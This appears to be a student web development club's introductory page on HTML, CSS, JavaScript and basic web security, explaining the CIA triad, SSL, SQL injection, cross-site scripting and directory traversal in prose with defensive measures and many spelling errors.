Web Development Club

Learn how to develop your own website that interacts with internal and external resources.

What Makes a Website

...

HTML5

HTML (HyperText Markup Language) is a descriptive language that specifies webpage structure.

...

CSS

CSS (Cascading Style Sheets) is a declarative language that controls how webpages look in the browser.

...

JavaScript

JavaScript (or "JS") is a programming language used most often for dynamic client-side scripts on webpages.

...

Cybersecurity

Cybersecurity is the art of protecting networks, devices, and data from unauthorized access or criminal use and the practice of ensuring confidentiality, integrity, and availability of information.

HTML

HyperText Markup Language

CSS

Cascading Styling Sheets

JS

JavaScript

Cybersecurity

When speaking of cyber security it is important to remember Confidentiality, Integrity, and Availiability. This is also known as the CIA triad. By understanding what the CIA triad is you will better be able to create policies for your website and think in a more secure mindset wehn developing a website. So let's go through the CIA traid.

- Confidentiality: When thinking about confidentiality it is important to think about how can I secure the data on my website. Confidentiality is the act of making sure that your data is secure and that sensitive information is not accessed from unauthorized individuals.

- Integrity: Integrity is very important as it lets the user know that the information can be trusted. This means that the data that making sure that the data that you have and is passing back to the user has not been altered in any way that is harmful. There are many people out there who will try to manipulate the data that your website is sending so that they can still outher users personal information.

- Availability: Availability is important because without it then your website when serve no point. Availability is making sure that you data is readily available for only authorized users. This means that if a user goes to your site and logs in then they should be able to access there information as long as they are properly authencticated.

SSL for a website provides a good layer of security. Say you are passing data back and forth between the server that is hosting your website and the computer that you are visiting your website from. You would want to make sure that the data that is being passed back and forth is secure. SSL allows this. What SSL is a certificate that is genrated by a certificate authority. Once you visit and HTTPS website that certificate is then checked to make sure it can be trusted and the data is then encrypted. This makes it very hard for hackers to obtain information and ensures that your website is protected.

Before we discuss SQL injection lets discuss what SQL is. SQL is standard query language. It is a language that you use to configure and manipulate databases. Many websites use databases for many reasons. One of the most commons reasons is to hold user accounts. These accounts are the same accounts that you use to login to a website. So what is SQL injection. SQL injection is an type of attack in which a user sends malicous SQL code from a website to the ddatabsae so that they can manipulate the database. This is easily done by typing SQL code into a login form on a website. Instead of typing in a username and a password the user insteads types in a string of SQL ccode that manipulates the database in some way. SQL injections do not always have to happen from a form on the website as they can also happen when a user types a web address into the web browser but insteaad adds some SQL code into the address as well.

Best ways to defend against it:

Input validation: this checks the user input to make sure that malicious code is not being passed through.

Firewalls: By using a web application firewall you can filter out SQL injection as well as other dangerous forms of attack

When discussing Cross Site Scripting also known as XSS it is important to realize that this is done using many different languages with one of the more common languages being JavaScript. XSS is very similiair to SQL in which a user types in malicous script into the web browser. They do this to steal information and obtain a number of things such as user passwords, key strokes from keyboards, finacial information, and much more. So how does this work. The way it works is that a user implants there JavaScript into a website via a webbrowser. Once this is done another user goes to the website and executes the malicous code in which a regular user has now become a victim of cross site scripting. The victims information is then stolen and used against them.

Ways to defend against it:

Input validation: this checks the user input to make sure that malicious code is not being passed through.

Firewalls: By using a web application firewall you can filter out and clock XSS

Escaping: this is done by not allowing characters that is used in languages such as CSS, JavaScript, HTML and many others. So if a user wanted to send some JavaScript code back to a web site then you can inspect that data before hand and take out any key charactes that JavaScript would need to run.

Directory traversal is also known as File Path Traversal attack. It is used to to allow an attacker to read the files of their choice on a system. Another way to think of it is an attacket types in a web address and sees that the website is loading an item like an image. The attacker then trys to make their way up to the root directory from that image by typing in a path of their own using the "../". This syntax allows the attacker to continue going up one directory until they are in the root directory. In the root directory they can grab whatever information they need. This could be user information from databases, applcation code, or any information that the attacker would like to use in order to exploit users. It is also possible for an attacker to write of file of their own that contains code that will allow them to change application data and behavior.

Ways to defend against it:

Input validation: this checks the user input to make sure that they are not doing anything malicous such as trying to navigate to the root directory.

Change where documents are loacted: By putting your documents on a different file server or partition then you can make it harder for those documents to be accessed.